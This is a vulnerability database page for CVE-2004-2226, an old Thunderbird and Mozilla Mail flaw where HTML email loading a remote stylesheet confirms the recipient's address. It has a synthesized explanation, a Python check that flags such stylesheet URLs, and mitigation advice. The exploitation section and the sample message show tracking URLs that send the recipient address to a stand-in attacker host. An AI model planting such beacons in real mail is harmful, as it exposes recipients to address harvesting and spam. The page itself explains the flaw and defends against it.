CVE-2004-2226
Description
HTML email referencing a remote CSS file allows attackers to verify email addresses in Mozilla Mail 1.7.1/1.7.3 and Thunderbird < 0.9.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A design weakness in the CSS fetching behavior of Mozilla Mail versions 1.7.1 and 1.7.3, as well as Mozilla Thunderbird before version 0.9, allows an attacker to confirm the validity of email addresses. By including an external Cascading Style Sheets (CSS) document in an HTML email, the mail client will make a network request to the attacker-controlled server when the email is rendered. This request reveals the recipient's email address if it is used within the CSS URL path [1].
Exploitation
An attacker sends an HTML-formatted email that references a CSS file hosted on their own server (e.g., http://attacker.com/css?target@example.com). The email must be displayed in a client that has HTML mail rendering enabled (the default in the affected versions). No user interaction beyond opening or previewing the message is required; the client automatically fetches the CSS. The attacker observes incoming HTTP requests to identify which specific email addresses were used in the CSS URLs [1].
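As an added illustration of the mechanism described above (example code written for this page, not part of the CVE record or of Mozilla's code), the following check extracts remote stylesheet references from an HTML mail body and flags any whose URL embeds the recipient address; the sample message and host names are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

# Constructed sample HTML mail body (not from the CVE record): the <link>
# stylesheet URL carries the recipient address, the @import does not.
SAMPLE_EMAIL_HTML = """<html><head>
<link rel="stylesheet" href="http://tracker.example/css?user@example.com">
<style>@import url("http://cdn.example/site.css");</style>
</head><body><p>Hello</p></body></html>"""


class _StylesheetRefs(HTMLParser):
    """Collect stylesheet URLs from <link rel=stylesheet> and @import rules."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "link" and "stylesheet" in (a.get("rel") or "").lower() and a.get("href"):
            self.urls.append(a["href"])
        elif tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            # @import url("...") and @import "..." inside inline <style> blocks
            self.urls += re.findall(r'@import\s+(?:url\()?["\']?([^"\')\s;]+)', data)


def external_stylesheets(html):
    """Return every stylesheet URL the client would fetch over HTTP(S)."""
    p = _StylesheetRefs()
    p.feed(html)
    return [u for u in p.urls if urlparse(u).scheme in ("http", "https")]


def beaconing_stylesheets(html, recipient):
    """Return remote stylesheet URLs that embed the recipient's address."""
    needle = recipient.lower()
    return [u for u in external_stylesheets(html) if needle in unquote(u).lower()]
```

A mail filter that blocks or rewrites the URLs this returns, or a client that simply never fetches remote stylesheets, removes the address-confirmation channel.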
Impact
Successful exploitation allows an attacker to determine whether a particular email address corresponds to an active user opening the message. This is a privacy and information disclosure issue; the attacker gains no further access to the system or to mailbox content, but the confirmation of valid addresses can be leveraged for spam targeting or social engineering campaigns [1].
Mitigation
Mozilla addressed this issue in Thunderbird version 0.9 and later [1]. Users of Mozilla Mail should upgrade to a fixed version (e.g., Mozilla Suite 1.8 or later) or disable HTML mail rendering in preferences. For versions prior to the fix, the only workaround is to disable automatic loading of external content. The vulnerability is not known to be listed in CISA's Known Exploited Vulnerabilities catalog.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:mozilla:thunderbird:0.8:*:*:*:*:*:*:*
- cpe:2.3:a:mozilla:thunderbird:1.7.1:*:*:*:*:*:*:*
- cpe:2.3:a:mozilla:thunderbird:1.7.3:*:*:*:*:*:*:*
- (no CPE) range: < 0.9
- (no CPE) range: = 1.7.1, = 1.7.3
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.